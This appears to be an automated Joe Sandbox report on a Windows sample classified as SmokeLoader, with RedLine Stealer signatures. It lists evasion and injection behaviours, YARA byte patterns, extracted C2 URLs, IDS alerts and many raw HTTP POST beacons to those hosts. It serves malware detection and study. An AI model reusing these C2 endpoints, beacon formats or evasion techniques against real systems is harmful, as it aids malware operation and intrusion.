Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rBwTlpgnjc.exe

Overview

General Information

Sample name:rBwTlpgnjc.exe
renamed because original name is a hash value
Original sample name:ee4e08febd22e594c7bcb70ea1b0252a.exe
Analysis ID:1432077
MD5:ee4e08febd22e594c7bcb70ea1b0252a
SHA1:b1594033fa6e0377ccaea80d1556459128c61a13
SHA256:3b6c00f64a1d047dfbed967d4fe8f320f4e4de9421a82d94dcb3eba07f23d939
Tags:exeRedLineStealer
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • rBwTlpgnjc.exe (PID: 1268 cmdline: "C:\Users\user\Desktop\rBwTlpgnjc.exe" MD5: EE4E08FEBD22E594C7BCB70EA1B0252A)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • ivfjsrs (PID: 4428 cmdline: C:\Users\user\AppData\Roaming\ivfjsrs MD5: EE4E08FEBD22E594C7BCB70EA1B0252A)
  • ivfjsrs (PID: 7092 cmdline: C:\Users\user\AppData\Roaming\ivfjsrs MD5: EE4E08FEBD22E594C7BCB70EA1B0252A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://nidoe.org/tmp/index.php", "http://sodez.ru/tmp/index.php", "http://uama.com.ua/tmp/index.php", "http://talesofpirates.net/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000000.00000002.2058699871.0000000004130000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000000.00000002.2059007895.0000000004344000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x7728:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000006.00000002.4450918361.0000000004136000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x6c90:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    Click to see the 9 entries

    System Summary

    barindex
    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\ivfjsrs, CommandLine: C:\Users\user\AppData\Roaming\ivfjsrs, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ivfjsrs, NewProcessName: C:\Users\user\AppData\Roaming\ivfjsrs, OriginalFileName: C:\Users\user\AppData\Roaming\ivfjsrs, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\ivfjsrs, ProcessId: 4428, ProcessName: ivfjsrs
    Timestamp:04/26/24-11:50:57.657192
    SID:2039103
    Source Port:49750
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:48:53.977641
    SID:2039103
    Source Port:49727
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:49:35.592735
    SID:2039103
    Source Port:49736
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:49:00.896944
    SID:2039103
    Source Port:49730
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:50:23.070925
    SID:2039103
    Source Port:49744
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:47:23.987965
    SID:2039103
    Source Port:49713
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:47:22.464464
    SID:2039103
    Source Port:49712
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:47:29.304265
    SID:2039103
    Source Port:49716
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:50:39.540792
    SID:2039103
    Source Port:49747
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:48:43.367329
    SID:2039103
    Source Port:49722
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:49:47.864493
    SID:2039103
    Source Port:49738
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:50:11.655696
    SID:2039103
    Source Port:49742
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:47:27.784659
    SID:2039103
    Source Port:49715
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:50:44.236303
    SID:2039103
    Source Port:49748
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:49:56.135562
    SID:2039103
    Source Port:49739
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:48:46.715630
    SID:2039103
    Source Port:49724
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:47:32.343784
    SID:2039103
    Source Port:49718
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:50:28.180861
    SID:2039103
    Source Port:49745
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:49:18.365467
    SID:2039103
    Source Port:49733
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:47:25.556178
    SID:2039103
    Source Port:49714
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:47:30.826079
    SID:2039103
    Source Port:49717
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:47:20.949841
    SID:2039103
    Source Port:49711
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:50:02.490715
    SID:2039103
    Source Port:49740
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:50:32.759541
    SID:2039103
    Source Port:49746
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:49:23.641505
    SID:2039103
    Source Port:49734
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:48:57.550009
    SID:2039103
    Source Port:49729
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:49:05.885669
    SID:2039103
    Source Port:49731
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:48:50.067757
    SID:2039103
    Source Port:49726
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:50:16.085964
    SID:2039103
    Source Port:49743
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:49:30.712687
    SID:2039103
    Source Port:49735
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:48:48.305830
    SID:2039103
    Source Port:49725
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:48:55.896378
    SID:2039103
    Source Port:49728
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:47:33.917741
    SID:2039103
    Source Port:49719
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:49:12.723020
    SID:2039103
    Source Port:49732
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:50:07.106115
    SID:2039103
    Source Port:49741
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:48:44.986285
    SID:2039103
    Source Port:49723
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:49:40.768533
    SID:2039103
    Source Port:49737
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:47:35.150965
    SID:2039103
    Source Port:49720
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/26/24-11:50:49.712608
    SID:2039103
    Source Port:49749
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: rBwTlpgnjc.exeAvira: detected
    Source: http://uama.com.ua/tmp/index.phpAvira URL Cloud: Label: malware
    Source: http://talesofpirates.net/tmp/index.phpAvira URL Cloud: Label: malware
    Source: http://sodez.ru/tmp/index.phpAvira URL Cloud: Label: malware
    Source: http://nidoe.org/tmp/index.phpAvira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Roaming\ivfjsrsAvira: detection malicious, Label: HEUR/AGEN.1361904
    Source: 00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nidoe.org/tmp/index.php", "http://sodez.ru/tmp/index.php", "http://uama.com.ua/tmp/index.php", "http://talesofpirates.net/tmp/index.php"]}
    Source: nidoe.orgVirustotal: Detection: 19%Perma Link
    Source: http://talesofpirates.net/tmp/index.phpVirustotal: Detection: 17%Perma Link
    Source: http://sodez.ru/tmp/index.phpVirustotal: Detection: 20%Perma Link
    Source: http://nidoe.org/tmp/index.phpVirustotal: Detection: 21%Perma Link
    Source: http://uama.com.ua/tmp/index.phpVirustotal: Detection: 18%Perma Link
    Source: C:\Users\user\AppData\Roaming\ivfjsrsVirustotal: Detection: 44%Perma Link
    Source: rBwTlpgnjc.exeVirustotal: Detection: 44%Perma Link
    Source: C:\Users\user\AppData\Roaming\ivfjsrsJoe Sandbox ML: detected
    Source: rBwTlpgnjc.exeJoe Sandbox ML: detected
    Source: rBwTlpgnjc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: Binary string: C:\xohayajixapeh mon-muvicupifujuja\rohagi_cedepamavosan.pdb source: rBwTlpgnjc.exe, ivfjsrs.2.dr
    Source: Binary string: C:\xohayajixapeh mon-muvicupifujuja\rohagi_cedepamavosan.pdb source: rBwTlpgnjc.exe, ivfjsrs.2.dr

    Networking

    barindex
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49711 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49712 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49713 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49714 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49715 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49716 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49717 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49718 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49719 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49720 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49722 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49723 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49724 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49725 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49726 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49727 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49728 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49729 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49730 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49731 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49732 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49733 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49734 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49735 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49736 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49737 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49738 -> 119.204.11.2:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49739 -> 190.187.52.42:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49740 -> 190.187.52.42:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49741 -> 190.187.52.42:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49742 -> 190.187.52.42:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49743 -> 190.187.52.42:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49744 -> 190.187.52.42:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49745 -> 190.187.52.42:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49746 -> 190.187.52.42:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49747 -> 190.187.52.42:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49748 -> 190.187.52.42:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49749 -> 190.187.52.42:80
    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49750 -> 190.187.52.42:80
    Source: C:\Windows\explorer.exeNetwork Connect: 190.187.52.42 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 119.204.11.2 80Jump to behavior
    Source: Malware configuration extractorURLs: http://nidoe.org/tmp/index.php
    Source: Malware configuration extractorURLs: http://sodez.ru/tmp/index.php
    Source: Malware configuration extractorURLs: http://uama.com.ua/tmp/index.php
    Source: Malware configuration extractorURLs: http://talesofpirates.net/tmp/index.php
    Source: Joe Sandbox ViewIP Address: 190.187.52.42 190.187.52.42
    Source: Joe Sandbox ViewASN Name: AMERICATELPERUSAPE AMERICATELPERUSAPE
    Source: Joe Sandbox ViewASN Name: KIXS-AS-KRKoreaTelecomKR KIXS-AS-KRKoreaTelecomKR
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkexntmwarsh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bxepraawugwqn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tjprilinnlddmg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dlytdgdqkjwsthka.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dlhsbtjkcsrywy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://guijonadpodebyqi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uhlohybvnslbwb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dnxsraqaaam.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jritymeowitfd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ylocvbbjhcotul.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lyvgfxwmddcnfb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qipuwsetjdsly.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sitrlilwixmijdwa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lkfxkpohfrqcuf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ymaqoerhmbiko.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lifcehnnpyaunk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bmvswhlxjuxjpf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://chqvujyrjfo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jldhvcofgpoohdqq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dpmkxcqjquv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vxtsdxtdlktwbdnl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://abowpkrstiub.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tboygovgxqdbv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ovkuafudign.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xbqpttmfpoa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rskpmxlavjxbjtbs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hphdpqnonfmpdqxq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qakjjulmdxb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jljckibghorwl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ypaypqoyqmujr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xqmcfngarfr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crqwqadvlmh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: nidoe.org
